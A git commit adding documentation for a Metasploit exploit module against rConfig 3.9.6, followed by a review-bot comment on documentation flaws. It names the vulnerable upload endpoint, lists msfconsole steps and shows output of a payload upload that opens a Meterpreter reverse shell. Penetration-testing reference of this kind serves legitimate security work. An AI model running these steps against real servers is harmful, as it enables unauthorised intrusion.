initial commit

This commit is contained in:
Yann Castel
2021-06-17 15:15:59 +02:00
parent e7983c3b6f
commit 0fda6b348d
2 changed files with 221 additions and 0 deletions
@@ -0,0 +1,57 @@
## Vulnerable Application
### Description
This module allows an attacker with a privileged rConfig account to start a reverse shell due to an
arbitrary file upload vulnerability in `/lib/crud/vendors.crud.php`. Then, the uploaded payload can be
triggered by a call to `images/vendor/<payload_file>.php`
### Installation
Vulnerable versions of rConfig can be downloaded from [here](https://www.cacti.net/downloads/). Then,
help yourself with [this](https://help.rconfig.com/gettingstarted/installation) installation guide.
You can also use this [docker file](https://hub.docker.com/r/libyerman/rconfig)
(as long as it is not updated and remains a 3.9.6 version of rConfig)
## Verification Steps
List the steps needed to make sure this thing works
1. Start `msfconsole`
2. `use exploit/linux/http/rconfig_authenticated_rce`
3. `set USERNAME <admin_username>`
4. `set PASSWORD <admin_password>`
5. `set TARGETURI <base_path_rconfig>` if the base path of rConfig web server is different from `/`
6. `check` to check if the targeted rConfig server is vulnerable
7. `run` the module to exploit the vulnerability and start a reverse shell
## Options
### USERNAME
Set the USERNAME of your admin account.
### PASSWORD
Set the PASSWORD of your admin account.
## Scenarios
This module was successfully tested on CentOS 7 with rConfig 3.9.6. See the following output :
```
msf6 exploit(rconfig_authenticated_rce) > run
[*] Started reverse TCP handler on X.X.X.X:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] Version 3.9.6 of rConfig found !
[+] The target is vulnerable.
[+] We successfully logged in !
[*] Uploading file 'uaxsv.php' containing the payload...
[*] Triggering the payload ...
[*] Sending stage (39282 bytes) to Y.Y.Y.Y
[*] Meterpreter session 13 opened (X.X.X.X:4444 -> Y.Y.Y.Y:38310) at 2021-06-17 14:41:00 +0200
meterpreter > getuid
Server username: apache (48)
```
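Review bot: the placeholder sentence "List the steps needed to make sure this thing works" under Verification Steps is left over from the module documentation template and should be dropped. Under Options, `TARGETURI` is used in step 5 but has no entry alongside USERNAME and PASSWORD; document it, including the default of `/`. In Installation, the download link points at https://www.cacti.net/downloads/, which is the Cacti project's download page rather than rConfig's; point it at the rConfig source and state explicitly which versions are affected, since only 3.9.6 is named, and only via the Docker image caveat. Minor: the Description paragraph ends without a period after `images/vendor/<payload_file>.php`, and the sample output has a space before the exclamation marks (`[+] Version 3.9.6 of rConfig found !`, `[+] We successfully logged in !`), which looks like a typo in the module's print strings rather than intended output.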